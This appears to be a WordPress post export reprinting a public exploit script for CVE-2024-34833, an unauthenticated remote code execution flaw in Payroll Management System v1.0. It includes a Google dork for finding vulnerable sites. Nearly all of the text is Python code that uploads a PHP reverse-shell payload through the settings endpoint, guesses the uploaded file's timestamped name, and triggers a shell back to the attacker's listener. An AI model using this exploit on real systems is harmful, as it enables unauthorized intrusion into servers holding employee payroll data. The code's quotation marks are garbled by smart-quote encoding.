# Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)
# Google Dork: intitle:”Employee’s Payroll Management System”
# Date: 16\/06\/2024
# Exploit Author: ShellUnease
# Vendor Homepage: https:\/\/www.sourcecodester.com\/
# Software Link: https:\/\/www.sourcecodester.com\/php\/14475\/payroll-management-system-using-phpmysql-source-code.html
# Version: v1.0
# Tested on: Kali Linux Apache Web Server
# CVE : CVE-2024-34833<\/p>\n
#!\/usr\/bin\/python
import argparse
import time
import requests<\/p>\n
class Exploit:
def __init__(self, rhost, rport, lhost, lport, https):
self.rhost = rhost
self.rport = rport
self.lhost = lhost
self.lport = lport
self.targetUrl = f’https:\/\/{rhost}:{rport}’ if https else f’http:\/\/{rhost}:{rport}’
self.banner()<\/p>\n
def banner(self):
print(“””
_____ _ _
| __ \\ | | |
| |__) |_ _ _ _ _ __ ___ | | |
| ___\/ _` | | | | ‘__\/ _ \\| | |
| | | (_| | |_| | | | (_) | | |
|_| _\\__,_|\\__, |_| \\___\/|_|_| _
| \\\/ | __\/ | | |
| \\ \/ | __ |___\/_ __ _ __ _ ___ _ __ ___ ___ _ __ | |_
| |\\\/| |\/ _` | ‘_ \\ \/ _` |\/ _` |\/ _ \\ ‘_ ` _ \\ \/ _ \\ ‘_ \\| __|
| | | | (_| | | | | (_| | (_| | __\/ | | | | | __\/ | | | |_
|_|__|_|\\__,_|_| |_|\\__,_|\\__, |\\___|_|_|_| |_|\\___|_|_|_|\\__|
\/ ____| | | __\/ | | __ \\ \/ ____| ____|
| (___ _ _ ___| |_ ___ |___\/___ | |__) | | | |__
\\___ \\| | | \/ __| __\/ _ \\ ‘_ ` _ \\ | _ \/| | | __|
____) | |_| \\__ \\ || __\/ | | | | | | | \\ \\| |____| |____
|_____\/ \\__, |___\/\\__\\___|_| |_| |_| |_| \\_\\\\_____|______|
__\/ |
|___\/
“””)<\/p>\n
def get_data(self):
return {
‘name’: ‘John Doe’,
’email’: ‘jdoe@gmail.com’,
‘contact’: ‘John Doe’,
‘about’: ‘John Doe’,
}<\/p>\n
def get_payload(self):
return (f'<?php $sock=fsockopen(“{self.lhost}”,{self.lport});$proc=proc_open(“sh”, array(0=>$sock, 1=>$sock, ‘
f’2=>$sock),$pipes); ?>’)<\/p>\n
def upload_rev_shell(self):
url = f'{self.targetUrl}\/ajax.php?action=save_settings’
print(f’Uploading a reverse shell via {url}’)
requests.post(url, files={‘img’: (‘a.php’, self.get_payload())},
data=self.get_data())
epoch = time.time()
timestamp = epoch – (epoch % 60)
timestamp_minus_one_min = timestamp – 60
timestamp_plus_one_min = timestamp + 60
return [f'{int(timestamp)}_a.php’, f'{int(timestamp_minus_one_min)}_a.php’,
f'{int(timestamp_plus_one_min)}_a.php’]\n
def open_rev_shell(self, candidates):
print(‘Opening a reverse shell’)
for candidate in candidates:
url = f'{self.targetUrl}\/assets\/img\/{candidate}’
try:
requests.get(url).raise_for_status()
print(f’Got a success response for {url}, you should have a revshell’)
return
except Exception as e:
print(f’Failed to open revshell using {url}’)
print(‘Guessing filename failed’)<\/p>\n
def exploit(self):
candidates = self.upload_rev_shell()
self.open_rev_shell(candidates)<\/p>\n
def get_args():
parser = argparse.ArgumentParser(
description=’Payroll Management System – Remote Code Execution (RCE) (Unauthenticated)’)
parser.add_argument(‘-rhost’, ‘–remote-host’, dest=”rhost”, required=True, action=’store’, help=’Remote host’)
parser.add_argument(‘-rport’, ‘–remote-port’, dest=”rport”, required=False, action=’store’, help=’Remote port’,
default=80)
parser.add_argument(‘-lhost’, ‘–local-host’, dest=”lhost”, required=True, action=’store’, help=’Local host’)
parser.add_argument(‘-lport’, ‘–local-port’, dest=”lport”, required=True, action=’store’, help=’Local port’)
parser.add_argument(‘-https’, ‘–https’, dest=”https”, required=False, action=’store_true’, help=’Use https’)
args = parser.parse_args()
return args<\/p>\n
if __name__ == ‘__main__’:
args = get_args()
exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)
exp.exploit()<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:”Employee’s Payroll Management System”# Date: 16\/06\/2024# Exploit Author: ShellUnease# Vendor Homepage: https:\/\/www.sourcecodester.com\/# Software Link: https:\/\/www.sourcecodester.com\/php\/14475\/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833 #!\/usr\/bin\/pythonimport argparseimport timeimport requests class Exploit:def __init__(self, rhost, rport, lhost, lport, https):self.rhost = rhostself.rport = rportself.lhost = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57524","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57524"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57524\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57524"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}